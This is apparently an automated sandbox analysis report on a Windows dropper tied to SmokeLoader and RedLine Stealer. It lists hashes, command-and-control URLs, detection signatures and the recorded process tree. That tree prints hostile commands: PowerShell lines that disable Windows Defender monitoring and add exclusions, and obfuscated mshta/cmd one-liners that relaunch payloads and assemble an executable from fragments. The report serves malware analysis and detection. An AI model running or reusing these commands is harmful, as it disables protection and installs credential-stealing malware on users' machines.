Overview
overview
10Static
static
022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows10_x64
10043d28836f...9f.exe
windows7_x64
10043d28836f...9f.exe
windows10_x64
10096fc162ed...c8.exe
windows7_x64
10096fc162ed...c8.exe
windows10_x64
101ad787b5aa...62.exe
windows7_x64
101ad787b5aa...62.exe
windows10_x64
10258cbb13ac...bd.exe
windows7_x64
10258cbb13ac...bd.exe
windows10_x64
1025d79c1a50...7f.exe
windows7_x64
1025d79c1a50...7f.exe
windows10_x64
104d27dca0a1...ef.exe
windows7_x64
104d27dca0a1...ef.exe
windows10_x64
10500e7e5c00...44.exe
windows7_x64
10500e7e5c00...44.exe
windows10_x64
10578a3a7a2b...b3.exe
windows7_x64
10578a3a7a2b...b3.exe
windows10_x64
107dc7ca2414...84.exe
windows7_x64
107dc7ca2414...84.exe
windows10_x64
1096c9fde298...34.exe
windows7_x64
1096c9fde298...34.exe
windows10_x64
109c4880a98c...82.exe
windows7_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows7_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows7_x64
10acf1b7d80f...e0.exe
windows10_x64
10ca14b87b56...83.exe
windows7_x64
10ca14b87b56...83.exe
windows10_x64
10cbf31d825a...d2.exe
windows7_x64
8cbf31d825a...d2.exe
windows10_x64
10Analysis
-
max time kernel
36s -
max time network
165s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
08-11-2021 10:07
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
Resource
win7-en-20211014
Behavioral task
behavioral4
Sample
043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
Resource
win7-en-20211014
Behavioral task
behavioral6
Sample
096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
Resource
win7-en-20211014
Behavioral task
behavioral8
Sample
1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
Resource
win10-en-20211104
Behavioral task
behavioral9
Sample
258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
Resource
win7-en-20211104
Behavioral task
behavioral10
Sample
258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
Resource
win7-en-20211104
Behavioral task
behavioral12
Sample
25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral15
Sample
500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
Resource
win7-en-20211104
Behavioral task
behavioral16
Sample
500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win7-en-20211014
Behavioral task
behavioral18
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
Resource
win10-en-20211104
Behavioral task
behavioral21
Sample
96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
Resource
win7-en-20211014
Behavioral task
behavioral22
Sample
96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
Resource
win10-en-20211104
Behavioral task
behavioral23
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win7-en-20211104
Behavioral task
behavioral24
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211014
Behavioral task
behavioral25
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win7-en-20211104
Behavioral task
behavioral26
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211014
Behavioral task
behavioral27
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win7-en-20211104
Behavioral task
behavioral28
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral29
Sample
ca14b87b565c6b1c90eb3365bed694bd9e8a8b3d0ab6e3ca0c680baec6422f83.exe
Resource
win7-en-20211104
Behavioral task
behavioral30
Sample
ca14b87b565c6b1c90eb3365bed694bd9e8a8b3d0ab6e3ca0c680baec6422f83.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win7-en-20211014
Behavioral task
behavioral32
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211104
General
-
Target
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
-
Size
3.5MB
-
MD5
a75539ada819b941531f116f3d50b13b
-
SHA1
942d264f3b0cc866c84114a06be4fa7aeb905b3c
-
SHA256
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0
-
SHA512
ee89498995cc1a9a91c754c391082f7e38fa22fee413033b6cb9318a0008baa7e8bfcf2a1c3aebc3fa1c0cbace33c27b8979953868b01dc296c9e01e0c8e3b49
Malware Config
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2576 2400 rundll32.exe 64 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral27/memory/2612-273-0x000000000041B23E-mapping.dmp family_redline behavioral27/memory/2604-270-0x000000000041B23E-mapping.dmp family_redline behavioral27/memory/2596-267-0x000000000041B242-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
resource yara_rule behavioral27/files/0x000600000001226b-71.dat aspack_v212_v242 behavioral27/files/0x000600000001226b-72.dat aspack_v212_v242 behavioral27/files/0x0006000000012269-73.dat aspack_v212_v242 behavioral27/files/0x0006000000012269-74.dat aspack_v212_v242 behavioral27/files/0x0006000000012279-77.dat aspack_v212_v242 behavioral27/files/0x0006000000012279-78.dat aspack_v212_v242 -
Executes dropped EXE 13 IoCs
pid Process 536 setup_installer.exe 1392 setup_install.exe 1468 Wed09ed6b36e57df5f.exe 996 Wed0944361c3621a67a6.exe 1900 Wed0900caa0501dc98f.exe 1832 Wed09c4c0c3d01.exe 1440 Wed09d761ab4704dd931.exe 1736 Wed0968d19e5ec37794.exe 1496 Wed090db89ca4c58.exe 816 Wed0983917533e.exe 1604 Wed09fbe3bf81.exe 1672 Wed09755e77ed017e8af.exe 1416 Wed091bab77a3bb62d.exe -
Loads dropped DLL 51 IoCs
pid Process 756 acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe 536 setup_installer.exe 536 setup_installer.exe 536 setup_installer.exe 536 setup_installer.exe 536 setup_installer.exe 536 setup_installer.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1392 setup_install.exe 1840 cmd.exe 1468 Wed09ed6b36e57df5f.exe 1468 Wed09ed6b36e57df5f.exe 1732 cmd.exe 1760 cmd.exe 1900 Wed0900caa0501dc98f.exe 1900 Wed0900caa0501dc98f.exe 1420 cmd.exe 1832 Wed09c4c0c3d01.exe 1832 Wed09c4c0c3d01.exe 880 cmd.exe 552 cmd.exe 552 cmd.exe 2008 cmd.exe 1736 Wed0968d19e5ec37794.exe 1736 Wed0968d19e5ec37794.exe 1652 cmd.exe 1652 cmd.exe 1496 Wed090db89ca4c58.exe 1496 Wed090db89ca4c58.exe 1800 cmd.exe 1800 cmd.exe 816 Wed0983917533e.exe 816 Wed0983917533e.exe 1604 Wed09fbe3bf81.exe 1604 Wed09fbe3bf81.exe 1344 cmd.exe 1344 cmd.exe 1672 Wed09755e77ed017e8af.exe 1672 Wed09755e77ed017e8af.exe 980 cmd.exe 1416 Wed091bab77a3bb62d.exe 1416 Wed091bab77a3bb62d.exe 1368 WerFault.exe 1368 WerFault.exe 1368 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com 28 ipinfo.io 29 ipinfo.io 40 ipinfo.io 43 api.db-ip.com 44 api.db-ip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1368 1392 WerFault.exe 29 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed0983917533e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed0983917533e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed0983917533e.exe -
Kills process with taskkill 2 IoCs
pid Process 2496 taskkill.exe 2272 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 816 Wed0983917533e.exe 816 Wed0983917533e.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 756 wrote to memory of 536 756 acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe 28 PID 756 wrote to memory of 536 756 acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe 28 PID 756 wrote to memory of 536 756 acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe 28 PID 756 wrote to memory of 536 756 acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe 28 PID 756 wrote to memory of 536 756 acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe 28 PID 756 wrote to memory of 536 756 acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe 28 PID 756 wrote to memory of 536 756 acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe 28 PID 536 wrote to memory of 1392 536 setup_installer.exe 29 PID 536 wrote to memory of 1392 536 setup_installer.exe 29 PID 536 wrote to memory of 1392 536 setup_installer.exe 29 PID 536 wrote to memory of 1392 536 setup_installer.exe 29 PID 536 wrote to memory of 1392 536 setup_installer.exe 29 PID 536 wrote to memory of 1392 536 setup_installer.exe 29 PID 536 wrote to memory of 1392 536 setup_installer.exe 29 PID 1392 wrote to memory of 836 1392 setup_install.exe 32 PID 1392 wrote to memory of 836 1392 setup_install.exe 32 PID 1392 wrote to memory of 836 1392 setup_install.exe 32 PID 1392 wrote to memory of 836 1392 setup_install.exe 32 PID 1392 wrote to memory of 836 1392 setup_install.exe 32 PID 1392 wrote to memory of 836 1392 setup_install.exe 32 PID 1392 wrote to memory of 836 1392 setup_install.exe 32 PID 1392 wrote to memory of 1000 1392 setup_install.exe 31 PID 1392 wrote to memory of 1000 1392 setup_install.exe 31 PID 1392 wrote to memory of 1000 1392 setup_install.exe 31 PID 1392 wrote to memory of 1000 1392 setup_install.exe 31 PID 1392 wrote to memory of 1000 1392 setup_install.exe 31 PID 1392 wrote to memory of 1000 1392 setup_install.exe 31 PID 1392 wrote to memory of 1000 1392 setup_install.exe 31 PID 1000 wrote to memory of 1200 1000 cmd.exe 33 PID 1000 wrote to memory of 1200 1000 cmd.exe 33 PID 1000 wrote to memory of 1200 1000 cmd.exe 33 PID 1000 wrote to memory of 1200 1000 cmd.exe 33 PID 1000 wrote to memory of 1200 1000 cmd.exe 33 PID 1000 wrote to memory of 1200 1000 cmd.exe 33 PID 1000 wrote to memory of 1200 1000 cmd.exe 33 PID 836 wrote to memory of 1184 836 cmd.exe 35 PID 836 wrote to memory of 1184 836 cmd.exe 35 PID 836 wrote to memory of 1184 836 cmd.exe 35 PID 836 wrote to memory of 1184 836 cmd.exe 35 PID 836 wrote to memory of 1184 836 cmd.exe 35 PID 836 wrote to memory of 1184 836 cmd.exe 35 PID 836 wrote to memory of 1184 836 cmd.exe 35 PID 1392 wrote to memory of 1840 1392 setup_install.exe 34 PID 1392 wrote to memory of 1840 1392 setup_install.exe 34 PID 1392 wrote to memory of 1840 1392 setup_install.exe 34 PID 1392 wrote to memory of 1840 1392 setup_install.exe 34 PID 1392 wrote to memory of 1840 1392 setup_install.exe 34 PID 1392 wrote to memory of 1840 1392 setup_install.exe 34 PID 1392 wrote to memory of 1840 1392 setup_install.exe 34 PID 1392 wrote to memory of 1732 1392 setup_install.exe 36 PID 1392 wrote to memory of 1732 1392 setup_install.exe 36 PID 1392 wrote to memory of 1732 1392 setup_install.exe 36 PID 1392 wrote to memory of 1732 1392 setup_install.exe 36 PID 1392 wrote to memory of 1732 1392 setup_install.exe 36 PID 1392 wrote to memory of 1732 1392 setup_install.exe 36 PID 1392 wrote to memory of 1732 1392 setup_install.exe 36 PID 1392 wrote to memory of 1760 1392 setup_install.exe 37 PID 1392 wrote to memory of 1760 1392 setup_install.exe 37 PID 1392 wrote to memory of 1760 1392 setup_install.exe 37 PID 1392 wrote to memory of 1760 1392 setup_install.exe 37 PID 1392 wrote to memory of 1760 1392 setup_install.exe 37 PID 1392 wrote to memory of 1760 1392 setup_install.exe 37 PID 1392 wrote to memory of 1760 1392 setup_install.exe 37 PID 1840 wrote to memory of 1468 1840 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe"C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS812C1826\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09ed6b36e57df5f.exeWed09ed6b36e57df5f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe4⤵
- Loads dropped DLL
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0944361c3621a67a6.exeWed0944361c3621a67a6.exe5⤵
- Executes dropped EXE
PID:996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe4⤵
- Loads dropped DLL
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0900caa0501dc98f.exeWed0900caa0501dc98f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe4⤵
- Loads dropped DLL
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exeWed090db89ca4c58.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1496 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )6⤵PID:2208
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"7⤵PID:2408
-
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA8⤵PID:2476
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )9⤵PID:2544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"10⤵PID:2712
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))9⤵PID:2868
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W10⤵PID:2916
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eChO "11⤵PID:3060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"11⤵PID:2160
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y ..\_enU.W11⤵PID:2292
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -IM "Wed090db89ca4c58.exe"8⤵
- Kills process with taskkill
PID:2496
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe4⤵
- Loads dropped DLL
PID:1420 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09c4c0c3d01.exeWed09c4c0c3d01.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1832 -
C:\Users\Admin\AppData\Roaming\1041789.exe"C:\Users\Admin\AppData\Roaming\1041789.exe"6⤵PID:2724
-
-
C:\Users\Admin\AppData\Roaming\2029126.exe"C:\Users\Admin\AppData\Roaming\2029126.exe"6⤵PID:2928
-
-
C:\Users\Admin\AppData\Roaming\7466937.exe"C:\Users\Admin\AppData\Roaming\7466937.exe"6⤵PID:1048
-
-
C:\Users\Admin\AppData\Roaming\7242542.exe"C:\Users\Admin\AppData\Roaming\7242542.exe"6⤵PID:1064
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2076
-
-
-
C:\Users\Admin\AppData\Roaming\596517.exe"C:\Users\Admin\AppData\Roaming\596517.exe"6⤵PID:1716
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0983917533e.exe4⤵
- Loads dropped DLL
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0983917533e.exeWed0983917533e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe4⤵
- Loads dropped DLL
PID:880 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09d761ab4704dd931.exeWed09d761ab4704dd931.exe5⤵
- Executes dropped EXE
PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe4⤵
- Loads dropped DLL
PID:552 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0968d19e5ec37794.exeWed0968d19e5ec37794.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0968d19e5ec37794.exeC:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed0968d19e5ec37794.exe6⤵PID:2596
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe4⤵PID:1080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe4⤵
- Loads dropped DLL
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09fbe3bf81.exeWed09fbe3bf81.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09fbe3bf81.exeC:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09fbe3bf81.exe6⤵PID:2604
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe4⤵
- Loads dropped DLL
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09755e77ed017e8af.exeWed09755e77ed017e8af.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09755e77ed017e8af.exeC:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed09755e77ed017e8af.exe6⤵PID:2612
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe4⤵
- Loads dropped DLL
PID:980 -
C:\Users\Admin\AppData\Local\Temp\7zS812C1826\Wed091bab77a3bb62d.exeWed091bab77a3bb62d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1416
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 4684⤵
- Loads dropped DLL
- Program crash
PID:1368
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2576 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2584
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2772
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCripT: ClOSE( CREatEobjeCt ( "WsCRIPt.sheLl" ). RuN ( "cMD.eXe /Q/c TyPe ""C:\Users\Admin\AppData\Roaming\596517.exe"" >qYZE.eXe && sTaRt qYZE.eXE -ptCb5EYRlk5vz& IF """" == """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\596517.exe"" ) do taskkill /F -im ""%~nXm"" " , 0,tRUe ) )1⤵PID:2448
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c TyPe "C:\Users\Admin\AppData\Roaming\596517.exe" >qYZE.eXe&& sTaRt qYZE.eXE -ptCb5EYRlk5vz&IF ""== "" for %m IN ("C:\Users\Admin\AppData\Roaming\596517.exe" ) do taskkill /F -im "%~nXm"2⤵PID:2508
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -im "596517.exe"3⤵
- Kills process with taskkill
PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\qYZE.eXeqYZE.eXE -ptCb5EYRlk5vz3⤵PID:2436
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCripT: ClOSE( CREatEobjeCt ( "WsCRIPt.sheLl" ). RuN ( "cMD.eXe /Q/c TyPe ""C:\Users\Admin\AppData\Local\Temp\qYZE.eXe"" >qYZE.eXe && sTaRt qYZE.eXE -ptCb5EYRlk5vz& IF ""-ptCb5EYRlk5vz"" == """" for %m IN ( ""C:\Users\Admin\AppData\Local\Temp\qYZE.eXe"" ) do taskkill /F -im ""%~nXm"" " , 0,tRUe ) )4⤵PID:2720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c TyPe "C:\Users\Admin\AppData\Local\Temp\qYZE.eXe" >qYZE.eXe&& sTaRt qYZE.eXE -ptCb5EYRlk5vz&IF "-ptCb5EYRlk5vz"== "" for %m IN ("C:\Users\Admin\AppData\Local\Temp\qYZE.eXe" ) do taskkill /F -im "%~nXm"5⤵PID:2876
-
-
-
